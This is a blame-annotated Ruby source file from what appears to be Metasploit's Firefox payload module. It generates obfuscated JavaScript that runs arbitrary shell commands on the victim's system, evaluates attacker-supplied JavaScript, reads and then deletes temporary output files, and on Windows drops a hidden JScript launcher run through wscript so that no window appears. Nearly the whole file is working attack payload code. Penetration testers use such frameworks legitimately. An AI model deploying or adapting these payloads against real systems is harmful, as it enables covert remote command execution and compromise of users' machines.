2014-01-02 08:20:54 +00:00
|
|
|
# -*- coding: binary -*-
|
|
|
|
require 'msf/core'
|
2014-09-24 21:05:00 +00:00
|
|
|
require 'msf/core/exploit/jsobfu'
|
2014-01-05 20:58:18 +00:00
|
|
|
require 'json'
|
2014-01-02 08:20:54 +00:00
|
|
|
|
|
|
|
module Msf::Payload::Firefox
|
2014-01-04 00:23:48 +00:00
|
|
|
|
2014-09-24 21:05:00 +00:00
|
|
|
# automatically obfuscate every Firefox payload
|
|
|
|
include Msf::Exploit::JSObfu
|
|
|
|
|
2014-01-07 22:17:34 +00:00
|
|
|
# Javascript source code of setTimeout(fn, delay)
|
|
|
|
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
|
|
|
|
def set_timeout_source
|
|
|
|
%Q|
|
|
|
|
var setTimeout = function(cb, delay) {
|
|
|
|
var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
|
|
|
|
timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
|
|
|
|
return timer;
|
|
|
|
};
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2014-05-21 20:32:29 +00:00
|
|
|
# Javascript source of readUntilToken(s)
|
|
|
|
# Continues reading the stream as data is available, until a pair of
|
|
|
|
# command tokens like [[aBcD123ffh]] [[aBcD123ffh]] is consumed.
|
|
|
|
#
|
|
|
|
# Returns a function that can be passed to the #onDataAvailable callback of
|
|
|
|
# nsIInputStreamPump that will buffer until a second token is read, or, in
|
|
|
|
# the absence of any tokens, a newline character is read.
|
|
|
|
#
|
|
|
|
# @return [String] javascript source code that exposes the readUntilToken(cb) function
|
|
|
|
def read_until_token_source
|
|
|
|
%Q|
|
|
|
|
var readUntilToken = function(cb) {
|
|
|
|
Components.utils.import("resource://gre/modules/NetUtil.jsm");
|
|
|
|
|
|
|
|
var buffer = '', m = null;
|
|
|
|
return function(request, context, stream, offset, count) {
|
|
|
|
buffer += NetUtil.readInputStreamToString(stream, count);
|
|
|
|
if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) {
|
|
|
|
if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) {
|
|
|
|
cb(m[2]);
|
|
|
|
buffer = '';
|
|
|
|
}
|
|
|
|
} else if (buffer.indexOf("\\n") > -1) {
|
|
|
|
cb(buffer);
|
|
|
|
buffer = '';
|
|
|
|
}
|
|
|
|
};
|
|
|
|
};
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2014-01-04 00:23:48 +00:00
|
|
|
# Javascript source code of readFile(path) - synchronously reads a file and returns
|
|
|
|
# its contents. The file is deleted immediately afterwards.
|
|
|
|
#
|
|
|
|
# @return [String] javascript source code that exposes the readFile(path) method
|
2014-01-02 08:20:54 +00:00
|
|
|
def read_file_source
|
2014-01-02 20:05:06 +00:00
|
|
|
%Q|
|
2014-01-02 08:20:54 +00:00
|
|
|
var readFile = function(path) {
|
|
|
|
try {
|
|
|
|
var file = Components.classes["@mozilla.org/file/local;1"]
|
|
|
|
.createInstance(Components.interfaces.nsILocalFile);
|
|
|
|
file.initWithPath(path);
|
|
|
|
|
|
|
|
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
|
|
|
|
.createInstance(Components.interfaces.nsIFileInputStream);
|
|
|
|
fileStream.init(file, 1, 0, false);
|
|
|
|
|
|
|
|
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
|
|
|
|
.createInstance(Components.interfaces.nsIBinaryInputStream);
|
|
|
|
binaryStream.setInputStream(fileStream);
|
|
|
|
var array = binaryStream.readByteArray(fileStream.available());
|
|
|
|
|
|
|
|
binaryStream.close();
|
|
|
|
fileStream.close();
|
|
|
|
file.remove(true);
|
|
|
|
|
2014-01-02 20:05:06 +00:00
|
|
|
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
|
|
|
|
} catch (e) { return ""; }
|
2014-01-02 08:20:54 +00:00
|
|
|
};
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2014-01-04 14:46:41 +00:00
|
|
|
# Javascript source code of runCmd(str,cb) - runs a shell command on the OS
|
2014-01-04 00:23:48 +00:00
|
|
|
#
|
|
|
|
# Because of a limitation of firefox, we cannot retrieve the shell output
|
|
|
|
# so the stdout/err are instead redirected to a temp file, which is read and
|
|
|
|
# destroyed after the command completes.
|
|
|
|
#
|
|
|
|
# On posix, the command is double wrapped in "/bin/sh -c" calls, the outer of
|
|
|
|
# which redirects stdout.
|
|
|
|
#
|
|
|
|
# On windows, the command is wrapped in two "cmd /c" calls, the outer of which
|
2014-01-04 14:46:41 +00:00
|
|
|
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
|
|
|
|
# to run the command without displaying the cmd.exe prompt.
|
|
|
|
#
|
2014-01-05 01:00:36 +00:00
|
|
|
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
|
2014-01-04 14:46:41 +00:00
|
|
|
# javascript code between the tags is eval'd and returned.
|
2014-01-04 00:23:48 +00:00
|
|
|
#
|
|
|
|
# @return [String] javascript source code that exposes the runCmd(str) method.
|
2014-01-02 08:20:54 +00:00
|
|
|
def run_cmd_source
|
2014-01-02 20:05:06 +00:00
|
|
|
%Q|
|
2014-01-07 22:17:34 +00:00
|
|
|
#{read_file_source}
|
|
|
|
#{set_timeout_source}
|
|
|
|
|
2014-01-02 08:20:54 +00:00
|
|
|
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
|
|
|
|
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|
2014-01-04 14:46:41 +00:00
|
|
|
var windows = (ua.indexOf("Windows")>-1);
|
2014-01-03 22:14:28 +00:00
|
|
|
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
|
2014-01-03 07:29:34 +00:00
|
|
|
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
|
2014-01-04 14:46:41 +00:00
|
|
|
var runCmd = function(cmd, cb) {
|
2014-01-07 22:17:34 +00:00
|
|
|
cb = cb \|\| (function(){});
|
|
|
|
|
|
|
|
if (cmd.trim().length == 0) {
|
|
|
|
setTimeout(function(){ cb("Command is empty string ('')."); });
|
|
|
|
return;
|
|
|
|
}
|
2014-01-05 01:00:36 +00:00
|
|
|
|
|
|
|
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
|
2014-01-04 14:46:41 +00:00
|
|
|
if (js) {
|
2014-01-05 01:00:36 +00:00
|
|
|
var tag = "[!JAVASCRIPT]";
|
2014-02-17 21:34:42 +00:00
|
|
|
var sync = true; /* avoid zalgo's reach */
|
2014-01-07 22:17:34 +00:00
|
|
|
var sent = false;
|
2014-01-07 22:23:24 +00:00
|
|
|
var retVal = null;
|
|
|
|
|
|
|
|
try {
|
2014-09-24 21:05:00 +00:00
|
|
|
this.send = function(r){
|
|
|
|
if (sent) return;
|
|
|
|
sent = true;
|
|
|
|
if (r) {
|
|
|
|
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
|
|
|
|
else cb(false, r+tag+"\\n");
|
2014-01-07 22:23:24 +00:00
|
|
|
}
|
2014-09-24 21:05:00 +00:00
|
|
|
};
|
|
|
|
retVal = Function(js[1]).call(this);
|
2014-01-07 22:23:24 +00:00
|
|
|
} catch (e) { retVal = e.message; }
|
2014-01-07 22:17:34 +00:00
|
|
|
|
|
|
|
sync = false;
|
|
|
|
|
|
|
|
if (retVal && !sent) {
|
|
|
|
sent = true;
|
|
|
|
setTimeout(function(){ cb(false, retVal+tag+"\\n"); });
|
|
|
|
}
|
|
|
|
|
2014-01-04 14:46:41 +00:00
|
|
|
return;
|
|
|
|
}
|
|
|
|
|
2014-01-02 08:20:54 +00:00
|
|
|
var shEsc = "\\\\$&";
|
2014-05-05 08:57:15 +00:00
|
|
|
var shPath = "/bin/sh -c";
|
2014-01-02 08:20:54 +00:00
|
|
|
|
2014-01-03 07:29:34 +00:00
|
|
|
if (windows) {
|
2014-01-04 00:23:48 +00:00
|
|
|
shPath = "cmd /c";
|
2014-01-02 08:20:54 +00:00
|
|
|
shEsc = "\\^$&";
|
2014-01-03 07:29:34 +00:00
|
|
|
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
|
|
|
|
.getService(Components.interfaces.nsIProperties)
|
|
|
|
.get("TmpD", Components.interfaces.nsIFile);
|
2014-01-04 00:23:48 +00:00
|
|
|
jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8+rand(12))}.js');
|
2014-01-03 07:29:34 +00:00
|
|
|
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
|
|
|
.createInstance(Components.interfaces.nsIFileOutputStream);
|
|
|
|
stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
|
|
|
|
stream.write(jscript, jscript.length);
|
|
|
|
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
|
|
|
|
stream.finish();
|
|
|
|
} else {
|
|
|
|
stream.close();
|
|
|
|
}
|
2014-01-02 08:20:54 +00:00
|
|
|
}
|
|
|
|
|
2014-01-04 00:23:48 +00:00
|
|
|
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
|
2014-01-02 08:20:54 +00:00
|
|
|
|
|
|
|
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
|
|
|
|
.getService(Components.interfaces.nsIProperties)
|
|
|
|
.get("TmpD", Components.interfaces.nsIFile);
|
|
|
|
stdout.append(stdoutFile);
|
|
|
|
|
2014-09-10 05:47:05 +00:00
|
|
|
var shell;
|
2015-02-02 22:49:03 +00:00
|
|
|
cmd = cmd.trim();
|
2014-01-03 07:29:34 +00:00
|
|
|
if (windows) {
|
2015-02-02 22:49:03 +00:00
|
|
|
shell = shPath+" "+cmd;
|
2014-01-04 00:23:48 +00:00
|
|
|
shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
|
2014-01-03 22:14:28 +00:00
|
|
|
var b64 = svcs.btoa(shell);
|
2014-01-03 07:34:57 +00:00
|
|
|
} else {
|
2014-09-10 05:47:05 +00:00
|
|
|
shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
|
2014-01-04 00:23:48 +00:00
|
|
|
shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
|
2014-01-03 07:29:34 +00:00
|
|
|
}
|
2015-02-02 22:49:03 +00:00
|
|
|
|
2014-01-03 07:29:34 +00:00
|
|
|
var process = Components.classes["@mozilla.org/process/util;1"]
|
|
|
|
.createInstance(Components.interfaces.nsIProcess);
|
2014-01-02 08:20:54 +00:00
|
|
|
var sh = Components.classes["@mozilla.org/file/local;1"]
|
|
|
|
.createInstance(Components.interfaces.nsILocalFile);
|
|
|
|
|
2014-01-03 07:29:34 +00:00
|
|
|
if (windows) {
|
|
|
|
sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
|
|
|
|
process.init(sh);
|
2014-01-03 22:14:28 +00:00
|
|
|
var args = [jscriptFile.path, b64];
|
2014-01-03 07:29:34 +00:00
|
|
|
process.run(true, args, args.length);
|
2014-01-04 00:23:48 +00:00
|
|
|
jscriptFile.remove(true);
|
2014-01-07 22:17:34 +00:00
|
|
|
setTimeout(function(){cb(false, cmd+"\\n"+readFile(stdout.path));});
|
2014-01-03 07:29:34 +00:00
|
|
|
} else {
|
2014-01-03 07:34:57 +00:00
|
|
|
sh.initWithPath("/bin/sh");
|
2014-01-03 07:29:34 +00:00
|
|
|
process.init(sh);
|
2014-01-04 00:23:48 +00:00
|
|
|
var args = ["-c", shell];
|
|
|
|
process.run(true, args, args.length);
|
2014-01-07 22:17:34 +00:00
|
|
|
setTimeout(function(){cb(false, readFile(stdout.path));});
|
2014-01-03 07:29:34 +00:00
|
|
|
}
|
2014-01-02 08:20:54 +00:00
|
|
|
};
|
|
|
|
|
|
|
|
|
end
|
2014-01-03 07:29:34 +00:00
|
|
|
|
2014-01-04 00:23:48 +00:00
|
|
|
# This file is dropped on the windows platforms to a temp file in order to prevent the
|
|
|
|
# cmd.exe prompt from appearing. It is executed and then deleted.
|
|
|
|
#
|
2014-02-17 21:31:45 +00:00
|
|
|
# Note: we should totally add a powershell replacement here.
|
|
|
|
#
|
2014-01-04 00:23:48 +00:00
|
|
|
# @return [String] JScript that reads its command-line argument, decodes
|
|
|
|
# base64 and runs it as a shell command.
|
2014-01-03 07:29:34 +00:00
|
|
|
def jscript_launcher
|
|
|
|
%Q|
|
2014-01-03 22:14:28 +00:00
|
|
|
var b64 = WScript.arguments(0);
|
|
|
|
var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");
|
|
|
|
var el = dom.createElement("root");
|
|
|
|
el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);
|
|
|
|
var stream = new ActiveXObject("ADODB.Stream");
|
|
|
|
stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);
|
|
|
|
stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;
|
|
|
|
var cmd = stream.ReadText();
|
|
|
|
(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
|
2014-01-03 07:29:34 +00:00
|
|
|
|
|
|
|
|
end
|
2014-05-21 20:32:29 +00:00
|
|
|
|
2014-01-03 07:29:34 +00:00
|
|
|
end
|